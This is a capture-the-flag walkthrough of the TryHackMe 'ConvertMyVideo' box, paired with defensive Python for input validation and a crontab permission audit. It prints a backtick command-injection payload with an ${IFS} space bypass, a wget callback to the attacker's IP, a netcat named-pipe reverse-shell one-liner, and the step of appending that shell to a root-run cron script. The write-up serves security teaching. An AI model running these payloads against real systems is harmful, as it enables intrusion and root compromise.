THM | ConvertMyVideo

This is a Linux box on TryHackMe.

Skills Learned

  • Command Injection

  • Finding cron jobs with pspy64

NMAP

IP: 10.10.185.77

(screenshot: nmap scan output)

Port 80

(screenshot: the web application on port 80)

Start Burp and intercept the request the page sends.

The response contains an error message, which tells us how the input is processed.

(screenshot: Burp request and the error in the response)

Foothold/shell

The error suggests the submitted URL reaches a shell, so we can try for command injection.

Send a backtick command substitution as the URL value:

`whoami`

(screenshot: response showing the output of the injected command)

We get www-data, so the parameter is indeed executed by a shell.

Let's see if we can get a hit on our machine using wget. Spaces are filtered, so ${IFS} (the shell's internal field separator, which expands to whitespace) stands in for them; see the linked reference for more on ${IFS}.

Payload: yt_url=`wget${IFS}http://10.9.0.78/`

We get the hit: the target makes an HTTP request to our machine.

Let's try for a reverse shell:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

Replace every " " with ${IFS} and every "&" with %26 (a raw & in the POST body would be parsed as a parameter separator).

We get the shell, but the connection drops soon after.
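The foothold above works because the application strips spaces but still hands the yt_url value to a shell. The following is an added example, not code from the room or its application: a hypothetical naive handler (the whitespace filter and the youtube-dl command line are assumptions) next to a hardened version that validates the URL against a conservative character set and passes it as an argv list, so no shell ever interprets it. The payloads are the ones used above; the accepted URL is a constructed sample.

```python
import re
import subprocess
import sys
from urllib.parse import urlparse

# Hypothetical naive handler (assumption): strip whitespace "for safety", then
# interpolate the value into one shell string, i.e. what shell=True would run.
_WHITESPACE = re.compile(r"\s+")


def vulnerable_command(yt_url: str) -> str:
    cleaned = _WHITESPACE.sub("", yt_url)
    return f"youtube-dl --get-title {cleaned}"


# Conservative URL character set. It deliberately leaves out backtick, $, {, },
# |, ;, quotes and whitespace, so the `cmd` and ${IFS} tricks are rejected
# before any process is started.
_ALLOWED = re.compile(r"[A-Za-z0-9._~:/?#@!&()*+,=%-]+")


def validate_url(yt_url: str) -> str:
    if not _ALLOWED.fullmatch(yt_url):
        raise ValueError("URL contains characters outside the allowed set")
    parsed = urlparse(yt_url)
    if parsed.scheme not in ("http", "https") or not parsed.netloc:
        raise ValueError("URL must be an absolute http(s) URL")
    return yt_url


def safe_argv(yt_url: str) -> list[str]:
    # argv form: the value goes straight to the child process, so even a
    # character that slipped past validation cannot become shell syntax.
    # "--" stops option parsing, so a value starting with "-" is not an option.
    return ["youtube-dl", "--get-title", "--", validate_url(yt_url)]


def is_rejected(yt_url: str) -> bool:
    try:
        safe_argv(yt_url)
    except ValueError:
        return True
    return False


def passed_literally(value: str) -> str:
    # Shows argv semantics: the child receives the value unchanged, nothing is
    # substituted. The Python interpreter stands in for the real tool so the
    # demo runs anywhere.
    proc = subprocess.run(
        [sys.executable, "-c", "import sys; print(sys.argv[1], end='')", value],
        capture_output=True, text=True, check=True,
    )
    return proc.stdout


if __name__ == "__main__":
    for payload in ("`whoami`", "wget${IFS}http://10.9.0.78/",
                    "https://example.com/watch?v=abc123"):
        print("shell string:", vulnerable_command(payload))
        if is_rejected(payload):
            print("hardened    : rejected")
        else:
            print("hardened    :", safe_argv(payload))
        print("child saw   :", passed_literally(payload))
```

The whitespace filter only removes literal spaces; `${IFS}` survives it untouched and is expanded later by the shell, which is exactly the bypass used above. The hardened path fixes the root cause (no shell) rather than the symptom (spaces), and the allowlist is a second layer in case the tool itself mishandles odd input.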

Let's try uploading the reverse shell as a script to the box and then executing it from there.

Found flag.txt.

(screenshot: flag.txt)

Priv Esc

Copy LinEnum.sh to the box and run it.

LinEnum shows that cron is running.

(screenshot: LinEnum output showing cron)

Let's copy pspy64 to the box and run it:

./pspy64

I found the cron script clean.sh:

cat clean.sh

We can append the reverse shell to it; since the script is run by root, we might get a root shell.

Edit clean.sh and wait for the cron job to trigger.

And we are root.

(screenshot: root shell)
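The privilege escalation works because a script that root runs from cron is writable by a low-privilege user. The following is an added example, not part of the room: a small audit that parses /etc/crontab-style lines and flags root jobs whose target is writable by others, not owned by the expected uid, missing, or given as a relative path. The crontab text and script files are constructed inside a temporary directory so it runs offline; the paths are not the room's.

```python
import os
import stat
import tempfile


def parse_system_crontab(text: str) -> list[tuple[str, str]]:
    """Return (user, command) pairs from /etc/crontab-style text.
    Skips comments, blank lines and VAR=value assignments."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if "=" in line.split(None, 1)[0]:
            continue
        fields = line.split(None, 6)  # 5 time fields, user, command
        if len(fields) < 7:
            continue
        entries.append((fields[5], fields[6]))
    return entries


def audit_crontab(text: str, expected_uid: int = 0) -> list[tuple[str, str]]:
    """Flag root-run cron targets that someone other than root could change."""
    findings = []
    for user, command in parse_system_crontab(text):
        if user != "root":
            continue
        target = command.split()[0]
        if not os.path.isabs(target):
            findings.append((target, "relative path, resolved through PATH at run time"))
            continue
        try:
            st = os.stat(target)
        except FileNotFoundError:
            findings.append((target, "target does not exist; whoever can create it decides what root runs"))
            continue
        reasons = []
        if st.st_uid != expected_uid:
            reasons.append(f"owned by uid {st.st_uid}, expected {expected_uid}")
        if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            reasons.append("group/world writable")
        parent = os.stat(os.path.dirname(target))
        if parent.st_mode & stat.S_IWOTH and not parent.st_mode & stat.S_ISVTX:
            reasons.append("parent directory world writable without sticky bit")
        if reasons:
            findings.append((target, "; ".join(reasons)))
    return findings


def demo() -> tuple[list[tuple[str, str]], str]:
    """Constructed fixture: one properly locked script, one world-writable
    clean.sh, a relative-path entry and a non-root job. Returns the findings
    and the path of the weak script."""
    workdir = tempfile.mkdtemp()
    good = os.path.join(workdir, "rotate.sh")
    weak = os.path.join(workdir, "clean.sh")
    for path in (good, weak):
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\n")
    os.chmod(good, 0o755)   # owner-writable only: fine
    os.chmod(weak, 0o777)   # anyone can edit what root will execute
    crontab = (
        "SHELL=/bin/sh\n"
        "PATH=/usr/sbin:/usr/bin:/sbin:/bin\n"
        f"*/1 * * * * root {weak}\n"
        f"0 3 * * * root {good}\n"
        "*/5 * * * * root cleanup.sh\n"
        f"*/1 * * * * www-data {weak}\n"
    )
    # The fixture files belong to the current user, so treat that uid as the
    # expected owner; on a real system the default of 0 (root) applies.
    return audit_crontab(crontab, expected_uid=os.getuid()), weak


if __name__ == "__main__":
    for target, reason in demo()[0]:
        print(f"{target}: {reason}")
```

On a real host, run audit_crontab over /etc/crontab and the files in /etc/cron.d with the default expected_uid of 0. The fix for a finding like clean.sh is the usual one: root-owned, mode 0755 or tighter, in a root-owned directory that is not writable by the web server user.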
